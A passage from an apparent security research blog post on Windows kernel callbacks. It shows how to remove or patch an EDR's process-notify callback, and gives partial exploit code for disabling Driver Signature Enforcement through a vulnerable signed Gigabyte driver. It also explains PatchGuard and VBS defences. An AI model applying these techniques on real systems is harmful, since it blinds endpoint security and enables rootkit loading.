All zeros. This is quite intrusive and that’s why I called it Cowboy Mode . Don’t do this! All the other notification callbacks that were registered by other system components are gone. PatchGuard won’t complain here. Separately, Windows Defender ( WdFilter.sys ) is disabled in my system; otherwise touching its callback would have consequences.
Note: If you want to know if PatchGuard will trigger after this change, you’ll need a different VM. PatchGuard will not run if kernel debugging is enabled .
Let’s now look at the second option, Delete Specific Process Notify Callback (Red Team Mode) . This is much less intrusive and probably aligns with your “mission”: silence the EDR while it still runs and everyone believes that everything is fine. So what’s the first thing to do? List all the process notify callbacks registered.
We locate our target, in this case [09] 0xfffff807027b1720 (edr.sys + 0x1720)
. We want to remove it because at the moment it is blocking our favourite h4x0r
tool ( injector.exe
).
Let’s use the -d
switch of our evilcli.exe
and the index of the EDR ( 09
as we can see above).
Let’s now list the registered callbacks again and see if our EDR is indeed gone, and we can run our favourite injector.exe
again.
We can. This is cool. However, what happens if you try to remove other registered callbacks? While you’ll succeed for most of them, it will fail for some others. For example, here’s what happens with CI.dll
:
That was unexpected, right? After all, this is ring0
vs ring0
. Well, I invite you to play a bit with this and figure out yourself why this happens. It’s not hard.
Before we answer the questions you may have at this moment, let’s look at the third option. Patch Specific Process Notify Callback (Threat Actor Mode) . Note that I didn’t use the words “Advanced” (Threat Actor Mode), or “State” (Actor Mode). Why? Bear with me for a moment.
This technique will simply patch the OnProcessNotify
function from our EDR. Which means, we won’t remove the callback. We’ll leave it there, but every time it is executed (a new notification arrives) it will simply return. How?
Let’s look at the code before we run our evilcli.exe
with the -p
option.
We have private symbols (that’s why I told you, in the beginning, to build the drivers with debug information), so we can simply do:
0: kd> u edr!OnProcessNotify
edr!OnProcessNotify:
fffff807`029f1720 4c89442418 mov qword ptr [rsp+18h],r8
fffff807`029f1725 4889542410 mov qword ptr [rsp+10h],rdx
fffff807`029f172a 48894c2408 mov qword ptr [rsp+8],rcx
fffff807`029f172f 56 push rsi
fffff807`029f1730 57 push rdi
fffff807`029f1731 4883ec78 sub rsp,78h
fffff807`029f1735 4883bc24a000000000 cmp qword ptr [rsp+0A0h],0
fffff807`029f173e 0f8442020000 je edr!OnProcessNotify+0x266 (fffff807`029f1986)
0: kd>
These are the first assembly instructions of our OnProcessNotify
function (its address is fffff807029f1720
) that are going to be executed every time a new process is created or terminated. Basically, where we can act on it. Block it, modify it, let it run.
Now let’s run our evilcli.exe
with the -p
option, the index of our EDR driver, and then look at this function address again.
And if we disassemble the edr!OnProcessNotify
function again…
0: kd> u edr!OnProcessNotify
edr!OnProcessNotify:
fffff807`029f1720 c3 ret
fffff807`029f1721 0000 add byte ptr [rax],al
fffff807`029f1723 0000 add byte ptr [rax],al
fffff807`029f1725 0000 add byte ptr [rax],al
fffff807`029f1727 002410 add byte ptr [rax+rdx],ah
fffff807`029f172a 48894c2408 mov qword ptr [rsp+8],rcx
fffff807`029f172f 56 push rsi
fffff807`029f1730 57 push rdi
0: kd>
What do we see now? A ret
instruction. Which means the EDR driver from now on will just not work as intended anymore. This trick is very intrusive, and it may bugcheck your system. If you didn’t get it yet, bugcheck is a different word for “blue screen”.
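If you compare the two listings byte by byte, the result looks like a single 8-byte write of the value 0xC3 over the start of the function. That’s my reading of the kd output, not a statement about how the Evil driver source does it. A quick Python simulation on a copy of the original bytes shows why the disassembly ends up with those odd add instructions:

```python
import struct

# First 15 bytes of edr!OnProcessNotify before the patch (from the listing)
before = bytes.fromhex("4c89442418" "4889542410" "48894c2408")

# Bytes kd shows after the patch: ret, three 2-byte adds, one 3-byte add,
# then the untouched third instruction
after_listing = bytes.fromhex("c3" "0000" "0000" "0000" "002410" "48894c2408")

patched = bytearray(before)
struct.pack_into("<Q", patched, 0, 0xC3)  # one little-endian 64-bit write

print(patched.hex())
print(bytes(patched) == after_listing)
```

Only the first byte matters for execution, since the ret returns before anything else runs. The zeros and the leftover 24 10 from the second mov are just what the disassembler makes of the bytes that follow.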
Why? The kernel pages where the code of the edr!OnProcessNotify function lives are read-only. To patch them we need to change WP, the Write Protect bit (bit 16) of the CR0 control register, which inhibits supervisor-level procedures from writing into read-only pages. There are safe and unsafe ways of doing it. You can look at the code, but keep in mind that if you try to patch the code while the WP bit is still set you’ll bugcheck the system. We need to clear this bit, which allows supervisor-level procedures to write into read-only pages (regardless of the U/S bit setting). However, if you clear the WP bit in CR0 and don’t revert your changes, you’ll also bugcheck the system. Why? PatchGuard. Also, a common error is to change CR0 on only one of the CPUs, forgetting that there’s a CR0 register per CPU. The theory behind safely applying these changes is quite long and I can’t/won’t cover it here. Research it properly if you want to know more. Or just look at the code, and assume that what I’m doing is correct. I can tell you that while what the code is doing is safe, it is not the “best” way of doing it. The proper way is to use an MDL to map the memory you want to patch. In the project’s code, you can also find how to use an MDL if you don’t feel like looking at better sources than this project.
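The bit arithmetic is the easy part. Below is a Python sketch of it, only to show which bit we are talking about. It obviously can’t touch a real CR0, the sample value is illustrative rather than read from a CPU, and the four-CPU list is a made-up stand-in for “do it on every processor”.

```python
CR0_WP = 1 << 16  # Write Protect is bit 16 of CR0

def wp_enabled(cr0):
    return bool(cr0 & CR0_WP)

def clear_wp(cr0):
    return cr0 & ~CR0_WP

def set_wp(cr0):
    return cr0 | CR0_WP

sample = 0x80050033  # illustrative CR0 value with WP set

# Every CPU has its own CR0, so the change has to be applied to each one
per_cpu_cr0 = [sample] * 4
unprotected = [clear_wp(cr0) for cr0 in per_cpu_cr0]
restored = [set_wp(cr0) for cr0 in unprotected]

print(hex(unprotected[0]), wp_enabled(unprotected[0]))
print(hex(restored[0]), wp_enabled(restored[0]))
```

The restore step is the one people forget. In a driver the window between clearing and restoring should be as short as possible, which is one more reason the MDL approach is the cleaner one.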
Now, the questions you may be asking yourself. What about anti-tampering? Aren’t EDRs, or AVs, checking if these callbacks are being zero’ed out, removed, or patched?
Probably they somehow should, right? The truth is… they aren’t. At least 90% of them aren’t. I only know of one case that implements heavy anti-tampering checks. However, even this single case I’m aware of is considering removing most of its checks. Why? This is heavy. When you execute code in the kernel you don’t want to be wasting CPU cycles. You don’t want to be checking regularly if your registered callback function address is still there. You need to find a balance. A better option is to use a timer, and if during a certain amount of time you don’t receive any notification then something is wrong. However, most of the software just assumes it’s fine, no one is going to do this . And if they do, the system is already compromised so why care?
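To make the timer idea a bit more concrete, here’s a toy Python model of it. It’s a sketch of the logic only: a real implementation would live in the driver and use a kernel timer, the class and method names are invented for this example, and the 60 second threshold is an arbitrary assumption.

```python
class CallbackWatchdog:
    """Flags a problem when no notification arrived for too long."""

    def __init__(self, max_silence_seconds):
        self.max_silence = max_silence_seconds
        self.last_seen = None

    def on_notification(self, now):
        # Called from the notify routine: one cheap store per event
        self.last_seen = now

    def looks_tampered(self, now):
        # Called from the timer: compare against the last event seen
        if self.last_seen is None:
            return False  # nothing observed yet, no baseline to compare
        return (now - self.last_seen) > self.max_silence

watchdog = CallbackWatchdog(max_silence_seconds=60)
watchdog.on_notification(now=100.0)
print(watchdog.looks_tampered(now=130.0))
print(watchdog.looks_tampered(now=200.0))
```

The cost on the hot path is a single write, and the check only runs when the timer fires. The trade-off is false positives on a quiet system, so the threshold needs tuning.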
Driver Signature Enforcement Bypass
Driver Signature Enforcement (DSE) is a feature, introduced with Windows Vista x64, that blocks a kernel-mode driver from loading, even with Administrator privileges, unless it is signed with a valid digital signature. As stated by j00ru , one thing known to anyone actively working on kernel security is that Driver Signature Enforcement (DSE for short) is not effective and can be bypassed with relative ease by any determined individual.
Historically, this feature has been bypassed multiple times, in a multitude of ways. There was a nice presentation at BlackHat 2018 by Joe Desimone and Gabriel Landau from Endgame , Kernel Mode Threats and Practical Defenses , where you can find multiple examples. The most famous are probably Turla and Duqu 2.0 .
Anyway, DSE is enabled by default since Windows Vista for 64-bit versions. Any driver must be signed by a legitimate publisher to be loaded. As we saw before, this feature can be disabled, because forcing everyone to have signed drivers even during their development process doesn’t sound like a good idea. So, when we enable test signing mode a watermark is displayed on the bottom right corner as we saw before.
As we know, many high profile rootkits found their way into loading unsigned code into the kernel and even leveraged kernel callbacks. Some examples are Mebroot, ZeroAccess, Rustock, Stuxnet, TDL3, Uroburos, Derusbi, Slingshot, and many others. So, how does the driver signing policy work? The best explanation I found was this blog post by j00ru : https://j00ru.vexillium.org/2010/06/insight-into-the-driver-signature-enforcement/
More precisely, the “Initialization” section. Where we can read: The actual heart of Code Integrity lies inside a single executable image, called CI.dll . And then he continues with: (…) the first function within our interest is the initialization routine, CI!CiInitialize. This routine is imported by the NT core (ntoskrnl.exe) and called during system initialization .
VOID SepInitializeCodeIntegrity()
{
    DWORD CiOptions;

    g_CiEnabled = FALSE;
    if(!InitIsWinPEMode)
        g_CiEnabled = TRUE;

    memset(g_CiCallbacks,0,3*sizeof(SIZE_T));
    CiOptions = 4|2;

    if(KeLoaderBlock)
    {
        if(*(DWORD*)(KeLoaderBlock+84))
        {
            if(SepIsOptionPresent((KeLoaderBlock+84),L"DISABLE_INTEGRITY_CHECKS"))
                CiOptions = 0;
            if(SepIsOptionPresent((KeLoaderBlock+84),L"TESTSIGNING"))
                CiOptions |= 8;
        }
        CiInitialize(CiOptions,(KeLoaderBlock+32),&g_CiCallbacks);
    }
}
The pseudocode above comes from the same post and presents the general idea of the SepInitializeCodeIntegrity routine. As can be seen, some global nt!g_CiEnabled variable is being set to FALSE / TRUE, depending on whether the machine is booting up in the WinPE mode. Furthermore, CiOptions is initialized accordingly to the system boot options and finally passed to the CiInitialize routine (…) .
Please read the whole post. However, the pseudocode above is enough for us to understand what’s going on and come up with a bypass ourselves. From above, we learned that the CiInitialize
function is located in the ci.dll
file. Its first argument, CiOptions
, contains the flags of the current signing policy. As we can see above, the default value of the flags ( CiOptions = 4|2; ) is 4 OR 2 (a bitwise OR), that is 0x6 in hexadecimal. Now, if test signing mode is enabled (the TESTSIGNING boot option), the flags will be equal to 4 OR 2 OR 8, that is 0xe in hexadecimal. With DISABLE_INTEGRITY_CHECKS the pseudocode resets the flags to 0 instead.
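The flag arithmetic from the pseudocode can be checked with a few lines of Python. This only mirrors the logic quoted above. The function name is mine, and a plain substring test stands in for SepIsOptionPresent, which is an assumption about how that routine matches options.

```python
def ci_options(load_options):
    """Mirror of the CiOptions logic in the SepInitializeCodeIntegrity pseudocode."""
    options = 4 | 2  # default policy flags
    if load_options:
        if "DISABLE_INTEGRITY_CHECKS" in load_options:
            options = 0
        if "TESTSIGNING" in load_options:
            options |= 8
    return options

for boot in ("", "TESTSIGNING", "DISABLE_INTEGRITY_CHECKS",
             "DISABLE_INTEGRITY_CHECKS TESTSIGNING"):
    print(repr(boot), hex(ci_options(boot)))
```

Note the order of the two checks: with both options present the result is 8, not 0xe, because the reset to 0 happens before the OR with 8.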
So, what if we exploit a kernel vulnerability, or a vulnerable kernel driver, that allows us to write into kernel space? That’s what we’ll do next.
Note: there are some other really interesting projects, like this one , this one , this one , etc. that even load fileless drivers as shellcode decreasing its footprint and making these techniques way stealthier. Worth having a look.
If you dive into the underground of the Game Hacking Scene you’ll find plenty of vulnerable drivers being used to cheat and bypass AntiCheat technology. Some of the drivers being abused are a complete disaster and look more like backdoors than anything else. One well-known driver was part of the game Street Fighter V, from Capcom. This driver’s only functionality is well described here. Basically, it would take a user pointer, disable SMEP, execute code at the pointer’s address, and enable SMEP again. According to Capcom, a “non-DRM anti-crack solution”. Right… Anyway, you may ask, why are we talking about this driver? First, because it is widely known. Second, because this driver could potentially be abused to load our unsigned code in the kernel. However, this driver’s signature was revoked and the driver can’t be loaded anymore. It’s not very common, but it happens.
As a proof-of-concept we’ll use a driver that’s vulnerable but still (as of today) unrevoked. However, before we proceed, there are some remarks I would like to make about loading drivers on Windows 10.
Note that Microsoft in April 2015 stated : with the release of Windows 10, all new Windows 10 kernel mode drivers must be submitted to and digitally signed by the Windows Hardware Developer Center Dashboard portal. Windows 10 will not load new kernel mode drivers which are not signed by the portal.
Additionally, starting 90 days after the release of Windows 10, the portal will only accept driver submissions, including both kernel and user mode driver submissions, that have a valid Extended Validation (“EV”) Code Signing Certificate.
This means that, unless UpgradedSystem is set, if you enable Secure Boot you’ll “activate” the new 1607+ policy. As we can read from above, this policy requires Attestation Signed drivers, or WHQL drivers, for drivers signed after October 29th 2015.
Geoff Chappell can describe what a WHQL-signed driver is better than me. A WHQL-signed driver is signed with a certificate whose private key is kept by Microsoft so that only Microsoft can do the signing. WHQL means Windows Hardware Quality Labs. For many years the only way that Microsoft would sign a driver for an Independent Software Vendor (ISV) was if the driver was sent to Microsoft with a record of having passed an appropriate WHQL test suite. In those years, a WHQL signature gave some assurance of the driver’s quality.
For the many sorts of driver for which Microsoft had not yet devised tests for hardware compatibility, ISVs simply could not get WHQL signatures. Such drivers could instead be cross-signed by the ISV using both a Software Publisher Certificate (SPC) that is issued to the ISV by a third-party certification authority (CA) and a publicly available cross-certificate that Microsoft issues to the CA. In the particular way that Windows validates signatures on drivers, the signature on a cross-signed driver has a root certificate from Microsoft but it’s one that distinguishes the code verification as having been out-sourced. Microsoft’s involvement in cross-signing is only indirect, to vet CAs as having sufficiently high standards for authenticating that whoever they issue their certificates to is an identifiable (and hopefully responsible) software publisher. A cross-signature is some assurance that the driver, of whatever quality, is the work of a specific known entity.
Don’t forget to read the Exceptions section, because as we can read here: https://docs.microsoft.com/en-gb/windows-hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later-
However, cross-signed drivers are still permitted if any of the following are true:
- The PC was upgraded from an earlier release of Windows to Windows 10, version 1607.
- Secure Boot is off in the BIOS.
- Driver was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA.
I’ve never used the portal myself, so I can only document here what Microsoft’s documentation states. If you are interested, there’s a nice post here where Christoph Lüders describes his experience purchasing an Extended Validation Certificate, getting an account on the portal, and going through the attestation route. Very informative. Additionally, have a look at this video from channel9 .
Why is this important? Because the driver I chose is not WHQL signed. This means that, if Secure Boot is enabled, this Gigabyte driver won’t load. Anyway, this driver serves our demo purpose perfectly.
The Gigabyte Driver
Microsoft has stated that a million unique driver hashes are seen through telemetry every month! Many of these drivers expose crazy functionality to user-mode, on top of plenty of other vulnerabilities. So, assuming that all the code that runs in ring0 is trusted is just a bad assumption, as we’ll see.
The nday I mentioned at the beginning of this post is this Gigabyte driver vulnerability. When I had to choose a driver for this PoC, this one immediately came to mind. The main reason is its hilarious report timeline.
I knew some of these Gigabyte drivers had been used by some gamers for cheating. And, based on the report timeline, I also knew that these vulnerabilities were probably still unfixed as of today (I didn’t bother checking). What I knew was that these drivers weren’t revoked and could still be loaded in the latest Windows 10 x64, and consequently exploited.
If you read SecureAuth’s Advisory, it seems there’s a party in ring0 and we are all invited, and especially welcome: arbitrary ring0 VM read/write, port mapped I/O access, MSR register access, and arbitrary physical memory read/write. It’s hard to choose one, but we’ll go with the easiest one, which is the first one. We only need to write one single byte to achieve our goal.
As we saw before, we need to change the value of the CI!g_CiOptions global variable. But we don’t know its address, right? Well yes, but any user can get it easily. From a medium integrity process (the integrity level of most programs a normal user runs) it is trivial to get the address we are interested in. Which means Kernel ASLR (KASLR) has no power here.
So from a medium integrity process, we can just leak ci!CiInitialize and CI!g_CiOptions.
As I mentioned before, a one-byte write in kernel space is enough to compromise the whole system. We learnt from SecureAuth’s Advisory that we can read and write arbitrary memory in ring0. We don’t care about reading because we are exploiting this vulnerability from medium integrity. Otherwise, we could use the read to leak memory and bypass KASLR from a low integrity process.
Anyway, from a medium integrity process all we have to do is find the base address of CI.dll (among other things, this DLL’s main job is to verify the integrity of digitally signed drivers). Here’s the function that enumerates all the system’s drivers and finds the base address we are interested in.
/* _NtQuerySystemInformation, SYSTEM_MODULE_INFORMATION and g_ListDrivers are declared elsewhere in the PoC. */
/* ModuleImage must point to a buffer of at least 256 bytes. */
BOOL EnumSystemDrivers(PVOID* ModuleBase, PCHAR ModuleImage)
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo;
    ULONG i, len = 0;
    NTSTATUS ret;
    HMODULE ntdllHandle;
    BOOL found = FALSE;

    ntdllHandle = GetModuleHandleW(L"ntdll");
    if (!ntdllHandle)
        return FALSE;

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntdllHandle, "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
        return FALSE;

    /* The first call is expected to fail; it only reports the required buffer size. */
    NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    if (len == 0)
        return FALSE;

    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    if (!pModuleInfo)
        return FALSE;

    ret = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
    if (ret < 0) /* negative NTSTATUS values are errors */
    {
        GlobalFree((HGLOBAL)pModuleInfo);
        return FALSE;
    }

    if (g_ListDrivers)
        printf("Base Address\t ImageName\n");

    for (i = 0; i < pModuleInfo->Count; i++)
    {
        if (g_ListDrivers)
            printf("%p %s\n", pModuleInfo->Module[i].Base, pModuleInfo->Module[i].ImageName);

        if (strstr(pModuleInfo->Module[i].ImageName, "CI.dll") != NULL)
        {
            strcpy_s(ModuleImage, 256, pModuleInfo->Module[i].ImageName);
            *ModuleBase = pModuleInfo->Module[i].Base;
            found = TRUE;
        }
    }

    GlobalFree((HGLOBAL)pModuleInfo);
    return found; /* FALSE when CI.dll was not in the list */
}
We define a structure following what the driver expects, as documented in SecureAuth’s Advisory:
typedef struct _GIO_MemCpyStruct {
    ULONG64 dest;
    ULONG64* src;
    DWORD size;
} GIO_MemCpyStruct;
And we call DeviceIoControl using the vulnerable IOCTL.
DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
Then it’s just a matter of initializing the structure with the correct values, and simple math to calculate the exact address of the global variable we want to modify.
CiInitialize - hModule + kBase - 0x9eb8
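The expression above is plain rebasing arithmetic: take an address resolved in a user-mode mapping of the image, turn it into an offset from that mapping’s base, and apply the offset to the kernel base. A minimal sketch of that arithmetic follows. The function and parameter names are hypothetical, the addresses in the usage note are invented, and the final distance (0x9eb8 in the text) is specific to the CI.dll build used in this post, so here it is just a parameter.

```c
#include <stdint.h>

/*
 * Translate an address resolved in a user-mode mapping of an image into the
 * address the same location has in the kernel's mapping of that image, then
 * step back by a build-specific distance. All names are hypothetical.
 */
static uint64_t rebase_address(uint64_t symbol_user, uint64_t base_user,
                               uint64_t base_kernel, uint64_t delta)
{
    uint64_t rva = symbol_user - base_user;  /* offset of the symbol inside the image */
    return base_kernel + rva - delta;        /* same offset in the kernel mapping, minus the distance */
}
```

For instance, with an invented user-mode base of 0x7FF600000000, a symbol at 0x7FF600012345, a kernel base of 0xFFFFF80000000000 and a distance of 0x345, the result is 0xFFFFF80000012000.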
You can easily finish the exploit yourself with the information above. Below is a quick demo of this “attack” (in a different VM without test signing mode, and without kernel debugging enabled). We start by loading Gigabyte’s vulnerable, signed driver. Then we disable DSE. We load our malicious driver successfully. And finally, we revert our changes (enabling DSE again).
So, is this exploit PatchGuard friendly? The CI.dll variables are indeed protected by PatchGuard (starting with Windows 8.1). However, this doesn’t mean we’ll get an instant PatchGuard reaction (a bugcheck). The change will eventually lead to a bugcheck when PatchGuard notices it, but if we revert the change (restore the original state) before that happens we’ll be fine. There’s obviously a risk here, as we don’t know when PatchGuard is going to look at our global variable. PatchGuard runs at random intervals, so the check can happen immediately after our change, 5 minutes later, one hour later, or 24 hours later. We don’t know.
Kernel Patch Protection (KPP)
Kernel Patch Protection (KPP), also known as PatchGuard, was first released for Windows XP 64-bit. Windows 32-bit systems don’t have PatchGuard enabled (not even Windows 10), due to many crazy legacy 32-bit drivers “messing” with critical Windows kernel structures.
Windows server versions don’t support 32-bit systems anymore, and hopefully, these are going away on the desktop too. I couldn’t find any statistics that would confirm it, as Microsoft doesn’t share that data. Anyway, we all know that it’s not easy to buy new 32-bit hardware anymore. I wouldn’t be surprised if Microsoft stops supporting 32-bit desktop systems too.
Anyway, what is PatchGuard? PatchGuard is a Windows Kernel anti-tampering system. Simply put, it creates hashes of the system’s critical structures and makes sure you don’t modify them.
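To make the “hash it, then check it later” idea concrete, here is a toy sketch in C. It is not how PatchGuard is implemented: the FNV-1a hash was picked only because it is short, and the guarded_region type and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* FNV-1a, used here only because it is short; not what PatchGuard uses. */
static uint64_t fnv1a(const void *data, size_t len)
{
    const unsigned char *p = (const unsigned char *)data;
    uint64_t h = 0xcbf29ce484222325ULL;
    for (size_t i = 0; i < len; i++) {
        h ^= p[i];
        h *= 0x100000001b3ULL;
    }
    return h;
}

/* Hypothetical "protected region": a baseline hash is recorded once and re-checked later. */
typedef struct {
    const void *addr;
    size_t      len;
    uint64_t    baseline;
} guarded_region;

static void guard_init(guarded_region *g, const void *addr, size_t len)
{
    g->addr = addr;
    g->len = len;
    g->baseline = fnv1a(addr, len);   /* snapshot of the known-good state */
}

/* Returns 1 if the region still matches its baseline, 0 if it was modified. */
static int guard_is_intact(const guarded_region *g)
{
    return fnv1a(g->addr, g->len) == g->baseline;
}
```

A checker built like this only sees the state at the moment it runs. A value that is modified and then restored between two checks goes unnoticed.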
As mentioned above, it is worth noting that PatchGuard just crashes the system when it sees something wrong. It doesn’t do anything to prevent the modification, or to revert any changes made. The bugcheck code you’ll see is 0x109, that is, CRITICAL_STRUCTURE_CORRUPTION. The best compilation of checks performed by PatchGuard I could find was in the book Windows Internals Part 1. Wikipedia also lists a few, but I wouldn’t trust it that much, as the sources for the claims are more than 10 years old. You can also find a few things you should avoid here.
As we know, many device drivers patch Windows kernel structures in a multitude of ways (such as dangerous version-specific constructs, hard-coded offsets, and code fingerprinting on frequently changing code), leading to system instability (to say the least). This is even true for Endpoint Security Software (actually AVs are/were the main cause of bugchecks for a long time). How ironic? One common case is/was patching the System Service Descriptor Table (SSDT), which is a table containing the array of pointers for each system call handler. The idea is to intercept these system calls to add some functionality on top of them and keep the users safe. Some AVs for 32-bit systems might still do this, and Endpoint Security Software vendors aren’t the only ones patching Windows kernel structures. Malware does the same, leading to further instability, because patching code that is already patched is tricky.
If we think about this problem, the truth is that protecting the kernel against these modifications is very hard (if not impossible) if everything is running in ring0. It’s a race, and a race that an attacker can always win. There’s no security boundary. For Microsoft, there’s not even a security boundary between Administrator and ring0 (and I agree). This is why PatchGuard is heavily obfuscated, to avoid being reversed and attacked. However, obfuscation is not a security boundary either. PatchGuard is only about increasing the cost (in time, and complexity) to a potential attacker. As mentioned above, PatchGuard is non-deterministic (random), and not documented, with the “ultimate” goal of making exploits unreliable (not stopping them). PatchGuard doesn’t run the same checks all the time, or all at once. It’s random, and multiple checks can run in parallel. Objectively, PatchGuard is security by obscurity at its best (at Microsoft maybe only 5 people have access to the source code, which is kept in a secret source code repository).
PatchGuard is trying to enforce the use of supported mechanisms to have full visibility of what’s happening on the system. These supported mechanisms are the subject of this post, that is, process, thread and image load notifications. On top of those there are mini-filter drivers (which allow on the fly “hooking” of all file operations), Object Manager filtering (removing certain access rights on the fly), NDIS and WFP filters (access to raw ethernet packets), and ETW (mentioned before).
We need to keep in mind that, even with KPP and DSE, we are still fighting a “lost” battle, which is ring0 vs ring0. Because of this, Microsoft now leverages the Hyper-V hypervisor to provide a new set of services known as Virtualization-based security (VBS).
There are some AV vendors already rolling their own hypervisor-based engines, and they will identify (as of today) the attacks mentioned before. Kaspersky, Avast, BitDefender, Qihoo and maybe others that I’m not aware of already implement their own hypervisor, be warned. This doesn’t mean that the AV software you install on your PC comes with a hypervisor. They don’t support nested virtualization (at least without breaking stuff). What happens is that their cloud solutions run over their hypervisor. What does this mean? Yes, all the files you have on your computer are “flying” to the cloud to be “analyzed”. If you were wondering, this is actually how Kaspersky has been detecting multiple 0days in the wild.
To know more about PatchGuard I highly recommend you read the awesome research by Tetrane here: https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.01.pdf. Also, anything from Skywing (now the main authority behind it) and Uninformed is pure gold. Check the References at the end of this post.
Virtualization-based Security (VBS)
With Virtualization-based Security , the kernel runs at a higher privilege than user-mode applications and is isolated from them.
In a nutshell, with VBS, user-mode and kernel-mode code run in VTL 0 (the traditional model) and are not aware of the existence of VTL 1. Anything in VTL 1 can’t be accessed from VTL 0. This means that even if a malicious actor obtains code execution in ring0 VTL 0, they still can’t access anything in VTL 1. Not even user-mode code (Isolated User Mode (IUM), as shown in the image below).
The best description and image illustrating what’s stated above I could find was from https://docs.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode--ium--processes (image: Microsoft copyrighted).
Needless to say, for VTL 1 to be fully trusted it requires Secure Boot, a non-compromised hypervisor, IOMMU supporting hardware, and an Intel Management Engine (ME) without vulnerabilities that can be exploited from VTL 0.
As described here, Virtual Secure Mode (VSM) is a feature that leverages the virtualization extensions of the CPU to provide added security of data in memory. (…) VSM leverages the on chip virtualization extensions of the CPU to sequester critical processes and their memory against tampering from malicious entities.
How is this different from the traditional model? Here, the hypervisor sits in between the hardware and the host (OS), abstracting the OS from the hardware.
(Image: Microsoft copyrighted)
In this way, the VSM instance is segregated from the normal operating system functions and is protected by attempts to read information in that mode. The protections are hardware assisted, since the hypervisor is requesting the hardware treat those memory pages differently. This is the same way to two virtual machines on the same host cannot interact with each other; their memory is independent and hardware regulated to ensure each VM can only access its own data.
Thanks to VSM (Virtual Secure Mode), Windows 10 comes with Device Guard . Device Guard is not a feature, but a set of features designed to work together to prevent and eliminate untrusted code from running on a Windows 10 system.
Among other things, we now have a protected mode where “sensitive” operations can be run. This is where Kernel Mode Code Integrity (KMCI) and the hypervisor code integrity control itself, which is called Hypervisor Code Integrity (HVCI), come from. Plus Configurable Code Integrity (CCI), which ensures that only trusted code runs from the boot loader onwards.
Configurable Code Integrity (CCI) allows the customization of a signature policy for user-mode and kernel code and protects the Windows OS from being compromised by “bad” drivers. Device Guard ensures the drivers are, at the least, signed by a known signature ( WHQL signed). Additionally, you can further restrict the drivers by whitelisting them in the policy. In this way, Device Guard will block drivers from loading dynamic code and block any driver that is not on the whitelist.
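The two-stage decision described above (a signature requirement first, then an optional whitelist) can be sketched as follows. This is a simplified illustration only: the types and names are hypothetical, and real policies match on signers and hashes rather than on bare file names.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified view of a driver as seen by the policy. */
typedef struct {
    const char *name;
    bool        whql_signed;
} driver_info;

/* Hypothetical policy: an optional whitelist on top of the signature requirement. */
typedef struct {
    const char *const *allowed;
    size_t             allowed_count;   /* 0 means no whitelist is configured */
} ci_policy;

static bool policy_allows(const ci_policy *p, const driver_info *d)
{
    if (!d->whql_signed)
        return false;                   /* baseline: must carry a known signature */
    if (p->allowed_count == 0)
        return true;                    /* no whitelist: the signature alone is enough */

    for (size_t i = 0; i < p->allowed_count; i++) {
        if (strcmp(p->allowed[i], d->name) == 0)
            return true;                /* signed and explicitly whitelisted */
    }
    return false;                       /* signed, but not on the whitelist */
}
```

With a whitelist in place, a signed driver that is not on the list is rejected, which is the property that matters against the bring-your-own-vulnerable-driver scenario.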
This is awesome and will mitigate the problem of bad actors bringing their own (known) vulnerable driver and exploiting it. One thing to notice though is that, as of today, you’ll barely find a system with VBS enabled. Even though most of the hardware already supports it, there are way too many incompatibilities (VMware, VirtualBox, etc) and everyone is turning it off. The latest release of Windows already comes with it enabled but only for fresh installs. If you have been upgrading your system it will be disabled.
Conclusions
This post only touches slightly on a small subset of the Windows Kernel Callbacks. The Windows Kernel has way more Callback mechanisms that are worth studying.
Many people say rootkits are dead. Are they? When we talk about rootkits people usually think about “hiding files”, “hiding processes”, and a few other lame things. This doesn’t make any sense. Rootkits are a path to something. Using a rootkit to hide a file, or a process is just “stupid”. There are many, many ways of doing things. Forensics tools will look at these things from multiple perspectives and they will catch you. You need to be smart. Remember Stuxnet ? They actually made this mistake. If you don’t know what mistake I’m talking about, it is time for you to do your research.
China, Russia, US, they all have kernel offensive capabilities. Today. People think PatchGuard solved an unsolvable problem. The trick is to learn how to live with PatchGuard, instead of trying to bypass it. If you do, the moment Microsoft finds out it will be patched. Look at InfinityHook for example (now patched). Also, if this subject interests you, make sure you look at the cool PatchGuard research from Tetrane (look at the references section below).
The reason we don’t see rootkits that often anymore is, in my opinion, that the cost of developing malware for the Windows Kernel has increased. To load drivers into the Windows Kernel you either need a stolen certificate, a zero-day exploit, or to bring your own vulnerable driver (like we saw with the Gigabyte driver). The complexity has increased indeed. Sc also leaves a strong footprint, and persistence is tricky. However, there are ways around it. Remember DoublePulsar? Do you know how it works?
As we briefly saw, even though PatchGuard is fighting a battle it can’t win, it is still quite interesting to study. You can write a driver to emulate PatchGuard, and look at the same things PatchGuard is looking at.
Ultimately, the addition of the secure kernel and VBS is an exciting step in modern OS architecture. And, at the same time, very annoying. Microsoft Windows is likely the most complex program ever created for a personal computer, “no one mind can comprehend it all”. That means this is a never-ending story, with many chapters yet to be written.
To be continued.
Unsorted References
- https://docs.microsoft.com/en-gb/archive/blogs/ash/windows-10-device-guard-and-credential-guard-demystified
- https://docs.microsoft.com/en-us/cpp/c-runtime-library/sal-annotations?view=vs-2019
- https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)
- https://docs.microsoft.com/en-us/sysinternals/downloads/debugview
- https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
- https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10
- https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw
